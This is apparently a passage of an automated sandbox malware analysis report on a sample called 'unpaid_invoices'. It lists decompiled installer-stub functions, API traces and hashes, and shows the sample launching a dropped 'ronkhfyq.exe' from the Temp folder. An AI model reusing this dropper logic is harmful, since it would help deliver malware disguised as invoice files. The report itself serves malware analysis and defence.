              • GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
              • SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction ID: 4d59290e3aa44cd58c99826dd52d8cee581d87a9a88888807f370448835cb7c6
              • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
              • Instruction Fuzzy Hash: C2D0C972504130ABC2502728AE0889ABB55EB642717014A35F9A5A62B0CB304C628A98
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405C1C(WCHAR* _a4) {
              				int _t2;
              
              				_t2 = CreateDirectoryW(_a4, 0); // executed
              				if(_t2 == 0) {
              					return GetLastError();
              				}
              				return 0;
              			}




              APIs
              • CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
              • GetLastError.KERNEL32 ref: 00405C30
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction ID: 9b4f5430b3bbe22f75525a6a8288bb62ac5ef9e6fdb3d88c50eeb6a92616e2bf
              • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
              • Instruction Fuzzy Hash: 1EC04C71218609AEE7705B209F0DB177A949B50741F11443A6686F40A0DA788455D92D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00406210(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}





              APIs
              • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0078E665,0078B730,0040357F,0078B730,0078E665,/ky,00793730,00004000,?,00000000,004033A9), ref: 00406224
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction ID: f08cceda346ec9350f11c22fcf513fe3bc01c5f1c17db0892cf19a12a1b56e8c
              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
              • Instruction Fuzzy Hash: 95E08C3220026AABCF10AE698C00AEB3B6CFB05360F01447AFE56E7040D334E83087A5
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004061E1(void* _a4, void* _a8, long _a12) {
              				int _t7;
              				long _t11;
              
              				_t11 = _a12;
              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
              				if(_t7 == 0 || _t11 != _a12) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}





              APIs
              • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00793730,0078B730,004035FB,?,?,004034FF,00793730,00004000,?,00000000,004033A9), ref: 004061F5
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction ID: a9904075eeec40e7e939a2dde13f9046a7e38eb284923ea40542f090f2fca858
              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
              • Instruction Fuzzy Hash: 66E08632500219ABDF106E519C04AEB375CFB01350F01487AFD22E2151E231E87187A8
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004035FE(long _a4) {
              				long _t2;
              
              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
              				return _t2;
              			}




              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032FC,?), ref: 0040360C
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E00401FA4() {
              				void* _t9;
              				intOrPtr _t13;
              				void* _t15;
              				void* _t17;
              				void* _t20;
              				void* _t22;
              
              				_t19 = E00402DA6(_t15);
              				E004056D0(0xffffffeb, _t7);
              				_t9 = E00405C51(_t19); // executed
              				_t20 = _t9;
              				if(_t20 == _t15) {
              					 *((intOrPtr*)(_t22 - 4)) = 1;
              				} else {
              					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
              						_t13 = E00406AE6(_t17, _t20); // executed
              						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
              							if(_t13 != _t15) {
              								 *((intOrPtr*)(_t22 - 4)) = 1;
              							}
              						} else {
              							E004065B5( *((intOrPtr*)(_t22 - 0xc)), _t13);
              						}
              					}
              					_push(_t20);
              					CloseHandle();
              				}
              				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t22 - 4));
              				return 0;
              			}









              APIs
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                • Part of subcall function 00405C51: CreateProcessW.KERNELBASE ref: 00405C7A
                • Part of subcall function 00405C51: CloseHandle.KERNEL32(?), ref: 00405C87
              • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401FEB
                • Part of subcall function 00406AE6: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                • Part of subcall function 00406AE6: GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
              • String ID:
              • API String ID: 2972824698-0
              • Opcode ID: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
              • Instruction ID: 2caf0deb9ca9c7db124b05ee4a2ba4d84aa6555efd1b03c2e112275a9e200b7a
              • Opcode Fuzzy Hash: efa72648fad6ec3f2344eb43542f960c9bac8b1359726ced394ac23af3d9461d
              • Instruction Fuzzy Hash: FCF09671904111E7DB11BBA59A88E9E76A4DF01318F25443BE102B21D0D77C4D419A6E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 95%
              			E0040580F(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
              				struct HWND__* _v8;
              				long _v12;
              				struct tagRECT _v28;
              				void* _v36;
              				signed int _v40;
              				int _v44;
              				int _v48;
              				signed int _v52;
              				int _v56;
              				void* _v60;
              				void* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				struct HWND__* _t94;
              				long _t95;
              				int _t100;
              				void* _t108;
              				intOrPtr _t130;
              				struct HWND__* _t134;
              				int _t156;
              				int _t159;
              				struct HMENU__* _t164;
              				struct HWND__* _t168;
              				struct HWND__* _t169;
              				int _t171;
              				void* _t172;
              				short* _t173;
              				short* _t175;
              				int _t177;
              
              				_t169 =  *0x7a7a84;
              				_t156 = 0;
              				_v8 = _t169;
              				if(_a8 != 0x110) {
              					if(_a8 == 0x405) {
              						CloseHandle(CreateThread(0, 0, E004057A3, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
              					}
              					if(_a8 != 0x111) {
              						L17:
              						_t171 = 1;
              						if(_a8 != 0x404) {
              							L25:
              							if(_a8 != 0x7b) {
              								goto L20;
              							}
              							_t94 = _v8;
              							if(_a12 != _t94) {
              								goto L20;
              							}
              							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
              							_a8 = _t95;
              							if(_t95 <= _t156) {
              								L36:
              								return 0;
              							}
              							_t164 = CreatePopupMenu();
              							AppendMenuW(_t164, _t156, _t171, E004066AB(_t156, _t164, _t171, _t156, 0xffffffe1));
              							_t100 = _a16;
              							_t159 = _a16 >> 0x10;
              							if(_a16 == 0xffffffff) {
              								GetWindowRect(_v8,  &_v28);
              								_t100 = _v28.left;
              								_t159 = _v28.top;
              							}
              							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
              								_v60 = _t156;
              								_v48 = 0x7a1f88;
              								_v44 = 0x1000;
              								_a4 = _a8;
              								do {
              									_a4 = _a4 - 1;
              									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
              								} while (_a4 != _t156);
              								OpenClipboard(_t156);
              								EmptyClipboard();
              								_t108 = GlobalAlloc(0x42, _t171 + _t171);
              								_a4 = _t108;
              								_t172 = GlobalLock(_t108);
              								do {
              									_v48 = _t172;
              									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
              									 *_t173 = 0xd;
              									_t175 = _t173 + 2;
              									 *_t175 = 0xa;
              									_t172 = _t175 + 2;
              									_t156 = _t156 + 1;
              								} while (_t156 < _a8);
              								GlobalUnlock(_a4);
              								SetClipboardData(0xd, _a4);
              								CloseClipboard();
              							}
              							goto L36;
              						}
              						if( *0x7a7a6c == _t156) {
              							ShowWindow( *0x7a8aa8, 8);
              							if( *0x7a8b2c == _t156) {
              								E004056D0( *((intOrPtr*)( *0x7a0f60 + 0x34)), _t156);
              							}
              							E004045A3(_t171);
              							goto L25;
              						}
              						 *0x7a0758 = 2;
              						E004045A3(0x78);
              						goto L20;
              					} else {
              						if(_a12 != 0x403) {
              							L20:
              							return E00404631(_a8, _a12, _a16);
              						}
              						ShowWindow( *0x7a7a70, _t156);
              						ShowWindow(_t169, 8);
              						E004045FF(_t169);
              						goto L17;
              					}
              				}
              				_v52 = _v52 | 0xffffffff;
              				_v40 = _v40 | 0xffffffff;
              				_t177 = 2;
              				_v60 = _t177;
              				_v56 = 0;
              				_v48 = 0;
              				_v44 = 0;
              				asm("stosd");
              				asm("stosd");
              				_t130 =  *0x7a8ab0;
              				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
              				_a12 =  *((intOrPtr*)(_t130 + 0x60));
              				 *0x7a7a70 = GetDlgItem(_a4, 0x403);
              				 *0x7a7a68 = GetDlgItem(_a4, 0x3ee);
              				_t134 = GetDlgItem(_a4, 0x3f8);
              				 *0x7a7a84 = _t134;
              				_v8 = _t134;
              				E004045FF( *0x7a7a70);
              				 *0x7a7a74 = E00404F58(4);
              				 *0x7a7a8c = 0;
              				GetClientRect(_v8,  &_v28);
              				_v52 = _v28.right - GetSystemMetrics(_t177);
              				SendMessageW(_v8, 0x1061, 0,  &_v60);
              				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
              				if(_a8 >= 0) {
              					SendMessageW(_v8, 0x1001, 0, _a8);
              					SendMessageW(_v8, 0x1026, 0, _a8);
              				}
              				if(_a12 >= _t156) {
              					SendMessageW(_v8, 0x1024, _t156, _a12);
              				}
              				_push( *((intOrPtr*)(_a16 + 0x30)));
              				_push(0x1b);
              				E004045CA(_a4);
              				if(( *0x7a8ab8 & 0x00000003) != 0) {
              					ShowWindow( *0x7a7a70, _t156);
              					if(( *0x7a8ab8 & 0x00000002) != 0) {
              						 *0x7a7a70 = _t156;
              					} else {
              						ShowWindow(_v8, 8);
              					}
              					E004045FF( *0x7a7a68);
              				}
              				_t168 = GetDlgItem(_a4, 0x3ec);
              				SendMessageW(_t168, 0x401, _t156, 0x75300000);
              				if(( *0x7a8ab8 & 0x00000004) != 0) {
              					SendMessageW(_t168, 0x409, _t156, _a12);
              					SendMessageW(_t168, 0x2001, _t156, _a8);
              				}
              				goto L36;
              			}

































              APIs
              • GetDlgItem.USER32 ref: 0040586D
              • GetDlgItem.USER32 ref: 0040587C
              • GetClientRect.USER32 ref: 004058B9
              • GetSystemMetrics.USER32 ref: 004058C0
              • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058E1
              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058F2
              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405905
              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405913
              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405926
              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405948
              • ShowWindow.USER32(?,00000008), ref: 0040595C
              • GetDlgItem.USER32 ref: 0040597D
              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040598D
              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A6
              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059B2
              • GetDlgItem.USER32 ref: 0040588B
                • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
              • GetDlgItem.USER32 ref: 004059CF
              • CreateThread.KERNEL32 ref: 004059DD
              • CloseHandle.KERNEL32(00000000), ref: 004059E4
              • ShowWindow.USER32(00000000), ref: 00405A08
              • ShowWindow.USER32(?,00000008), ref: 00405A0D
              • ShowWindow.USER32(00000008), ref: 00405A57
              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A8B
              • CreatePopupMenu.USER32 ref: 00405A9C
              • AppendMenuW.USER32 ref: 00405AB0
              • GetWindowRect.USER32 ref: 00405AD0
              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE9
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B21
              • OpenClipboard.USER32(00000000), ref: 00405B31
              • EmptyClipboard.USER32 ref: 00405B37
              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B43
              • GlobalLock.KERNEL32 ref: 00405B4D
              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B61
              • GlobalUnlock.KERNEL32(00000000), ref: 00405B81
              • SetClipboardData.USER32 ref: 00405B8C
              • CloseClipboard.USER32 ref: 00405B92
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
              • String ID: {
              • API String ID: 590372296-366298937
              • Opcode ID: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
              • Instruction ID: f3bb878df23a29f955279a02cf148875578f9ab87112c8cbe183df0a3e5e7c84
              • Opcode Fuzzy Hash: a77729b42b97d1460badf31275b058d201800e7c8612f90bf0790785bfc588e5
              • Instruction Fuzzy Hash: 7DB16BB1900608FFDF119F64DD89AAE7B79FB45354F00802AFA41BA1A0CB785E51DF68
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 78%
              			E00404ABB(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
              				signed int _v8;
              				signed int _v12;
              				long _v16;
              				long _v20;
              				long _v24;
              				char _v28;
              				intOrPtr _v32;
              				long _v36;
              				char _v40;
              				unsigned int _v44;
              				signed int _v48;
              				WCHAR* _v56;
              				intOrPtr _v60;
              				intOrPtr _v64;
              				intOrPtr _v68;
              				WCHAR* _v72;
              				void _v76;
              				struct HWND__* _v80;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr _t82;
              				long _t87;
              				short* _t89;
              				void* _t95;
              				signed int _t96;
              				int _t109;
              				signed short _t114;
              				signed int _t118;
              				struct HWND__** _t122;
              				intOrPtr* _t138;
              				WCHAR* _t146;
              				unsigned int _t150;
              				signed int _t152;
              				unsigned int _t156;
              				signed int _t158;
              				signed int* _t159;
              				signed int* _t160;
              				struct HWND__* _t166;
              				struct HWND__* _t167;
              				int _t169;
              				unsigned int _t197;
              
              				_t156 = __edx;
              				_t82 =  *0x7a0f60;
              				_v32 = _t82;
              				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x7a9000;
              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
              				if(_a8 == 0x40b) {
              					E00405CB2(0x3fb, _t146);
              					E004068F5(_t146);
              				}
              				_t167 = _a4;
              				if(_a8 != 0x110) {
              					L8:
              					if(_a8 != 0x111) {
              						L20:
              						if(_a8 == 0x40f) {
              							L22:
              							_v8 = _v8 & 0x00000000;
              							_v12 = _v12 & 0x00000000;
              							E00405CB2(0x3fb, _t146);
              							if(E00406045(_t186, _t146) == 0) {
              								_v8 = 1;
              							}
              							E0040666E(0x79ff58, _t146);
              							_t87 = E00406A3B(1);
              							_v16 = _t87;
              							if(_t87 == 0) {
              								L30:
              								E0040666E(0x79ff58, _t146);
              								_t89 = E00405FE8(0x79ff58);
              								_t158 = 0;
              								if(_t89 != 0) {
              									 *_t89 = 0;
              								}
              								if(GetDiskFreeSpaceW(0x79ff58,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
              									goto L35;
              								} else {
              									_t169 = 0x400;
              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
              									asm("cdq");
              									_v48 = _t109;
              									_v44 = _t156;
              									_v12 = 1;
              									goto L36;
              								}
              							} else {
              								_t159 = 0;
              								if(0 == 0x79ff58) {
              									goto L30;
              								} else {
              									goto L26;
              								}
              								while(1) {
              									L26:
              									_t114 = _v16(0x79ff58,  &_v48,  &_v28,  &_v40);
              									if(_t114 != 0) {
              										break;
              									}
              									if(_t159 != 0) {
              										 *_t159 =  *_t159 & _t114;
              									}
              									_t160 = E00405F89(0x79ff58);
              									 *_t160 =  *_t160 & 0x00000000;
              									_t159 = _t160;
              									 *_t159 = 0x5c;
              									if(_t159 != 0x79ff58) {
              										continue;
              									} else {
              										goto L30;
              									}
              								}
              								_t150 = _v44;
              								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
              								_v44 = _t150 >> 0xa;
              								_v12 = 1;
              								_t158 = 0;
              								__eflags = 0;
              								L35:
              								_t169 = 0x400;
              								L36:
              								_t95 = E00404F58(5);
              								if(_v12 != _t158) {
              									_t197 = _v44;
              									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
              										_v8 = 2;
              									}
              								}
              								if( *((intOrPtr*)( *0x7a7a7c + 0x10)) != _t158) {
              									E00404F40(0x3ff, 0xfffffffb, _t95);
              									if(_v12 == _t158) {
              										SetDlgItemTextW(_a4, _t169, 0x79ff48);
              									} else {
              										E00404E77(_t169, 0xfffffffc, _v48, _v44);
              									}
              								}
              								_t96 = _v8;
              								 *0x7a8b44 = _t96;
              								if(_t96 == _t158) {
              									_v8 = E0040140B(7);
              								}
              								if(( *(_v32 + 0x14) & _t169) != 0) {
              									_v8 = _t158;
              								}
              								E004045EC(0 | _v8 == _t158);
              								if(_v8 == _t158 &&  *0x7a1f78 == _t158) {
              									E00404A14();
              								}
              								 *0x7a1f78 = _t158;
              								goto L53;
              							}
              						}
              						_t186 = _a8 - 0x405;
              						if(_a8 != 0x405) {
              							goto L53;
              						}
              						goto L22;
              					}
              					_t118 = _a12 & 0x0000ffff;
              					if(_t118 != 0x3fb) {
              						L12:
              						if(_t118 == 0x3e9) {
              							_t152 = 7;
              							memset( &_v76, 0, _t152 << 2);
              							_v80 = _t167;
              							_v72 = 0x7a1f88;
              							_v60 = E00404E11;
              							_v56 = _t146;
              							_v68 = E004066AB(_t146, 0x7a1f88, _t167, 0x7a0760, _v12);
              							_t122 =  &_v80;
              							_v64 = 0x41;
              							__imp__SHBrowseForFolderW(_t122);
              							if(_t122 == 0) {
              								_a8 = 0x40f;
              							} else {
              								__imp__CoTaskMemFree(_t122);
              								E00405F3D(_t146);
              								_t125 =  *((intOrPtr*)( *0x7a8ab0 + 0x11c));
              								if( *((intOrPtr*)( *0x7a8ab0 + 0x11c)) != 0 && _t146 == L"C:\\Users\\jones\\AppData\\Local\\Temp") {
              									E004066AB(_t146, 0x7a1f88, _t167, 0, _t125);
              									if(lstrcmpiW(0x7a6a40, 0x7a1f88) != 0) {
              										lstrcatW(_t146, 0x7a6a40);
              									}
              								}
              								 *0x7a1f78 =  *0x7a1f78 + 1;
              								SetDlgItemTextW(_t167, 0x3fb, _t146);
              							}
              						}
              						goto L20;
              					}
              					if(_a12 >> 0x10 != 0x300) {
              						goto L53;
              					}
              					_a8 = 0x40f;
              					goto L12;
              				} else {
              					_t166 = GetDlgItem(_t167, 0x3fb);
              					if(E00405FB4(_t146) != 0 && E00405FE8(_t146) == 0) {
              						E00405F3D(_t146);
              					}
              					 *0x7a7a78 = _t167;
              					SetWindowTextW(_t166, _t146);
              					_push( *((intOrPtr*)(_a16 + 0x34)));
              					_push(1);
              					E004045CA(_t167);
              					_push( *((intOrPtr*)(_a16 + 0x30)));
              					_push(0x14);
              					E004045CA(_t167);
              					E004045FF(_t166);
              					_t138 = E00406A3B(8);
              					if(_t138 == 0) {
              						L53:
              						return E00404631(_a8, _a12, _a16);
              					} else {
              						 *_t138(_t166, 1);
              						goto L8;
              					}
              				}
              			}

              APIs
              • GetDlgItem.USER32 ref: 00404B0A
              • SetWindowTextW.USER32(00000000,?), ref: 00404B34
              • SHBrowseForFolderW.SHELL32(?), ref: 00404BE5
              • CoTaskMemFree.OLE32(00000000), ref: 00404BF0
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq,007A1F88,00000000,?,?), ref: 00404C22
              • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq), ref: 00404C2E
              • SetDlgItemTextW.USER32 ref: 00404C40
                • Part of subcall function 00405CB2: GetDlgItemTextW.USER32(?,?,00000400,00404C77), ref: 00405CC5
                • Part of subcall function 004068F5: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406958
                • Part of subcall function 004068F5: CharNextW.USER32(?,?,?,00000000,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00406967
                • Part of subcall function 004068F5: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040696C
                • Part of subcall function 004068F5: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403621,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 0040697F
              • GetDiskFreeSpaceW.KERNEL32(0079FF58,?,?,0000040F,?,0079FF58,0079FF58,?,00000001,0079FF58,?,?,000003FB,?), ref: 00404D03
              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D1E
                • Part of subcall function 00404E77: lstrlenW.KERNEL32(007A1F88,007A1F88,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F18
                • Part of subcall function 00404E77: wsprintfW.USER32 ref: 00404F21
                • Part of subcall function 00404E77: SetDlgItemTextW.USER32 ref: 00404F34
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\ronkhfyq.exe C:\Users\user\AppData\Local\Temp\neslq
              • API String ID: 2624150263-536565431
              • Opcode ID: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
              • Instruction ID: 4ef08ca0e285fb36132dd1072a135484aded6f5102cec428142970bb06395e88
              • Opcode Fuzzy Hash: 1c3e24ea3c91ff4ce813832bee9d1a6c89b271b1ee61e594e0d9cbeb6062d674
              • Instruction Fuzzy Hash: 77A182B1901209ABEB11AFA5CD45AEF77B9EF84314F11803BF601B62D1DB7C89418B69
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E004021AA() {
              				signed int _t52;
              				void* _t56;
              				intOrPtr* _t60;
              				intOrPtr _t61;
              				intOrPtr* _t62;
              				intOrPtr* _t64;
              				intOrPtr* _t66;
              				intOrPtr* _t68;
              				intOrPtr* _t70;
              				intOrPtr* _t72;
              				intOrPtr* _t74;
              				intOrPtr* _t76;
              				intOrPtr* _t78;
              				intOrPtr* _t80;
              				void* _t83;
              				intOrPtr* _t91;
              				signed int _t101;
              				signed int _t105;
              				void* _t107;
              
              				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
              				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
              				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
              				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
              				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
              				_t52 =  *(_t107 - 0x20);
              				 *(_t107 - 0x50) = _t52 & 0x00000fff;
              				_t101 = _t52 & 0x00008000;
              				_t105 = _t52 >> 0x0000000c & 0x00000007;
              				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
              				if(E00405FB4( *((intOrPtr*)(_t107 - 0x44))) == 0) {
              					E00402DA6(0x21);
              				}
              				_t56 = _t107 + 8;
              				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
              				if(_t56 < _t83) {
              					L14:
              					 *((intOrPtr*)(_t107 - 4)) = 1;
              					_push(0xfffffff0);
              				} else {
              					_t60 =  *((intOrPtr*)(_t107 + 8));
              					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
              					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
              					if(_t61 >= _t83) {
              						_t64 =  *((intOrPtr*)(_t107 + 8));
              						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
              						if(_t101 == _t83) {
              							_t80 =  *((intOrPtr*)(_t107 + 8));
              							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\jones\\AppData\\Local\\Temp");
              						}
              						if(_t105 != _t83) {
              							_t78 =  *((intOrPtr*)(_t107 + 8));
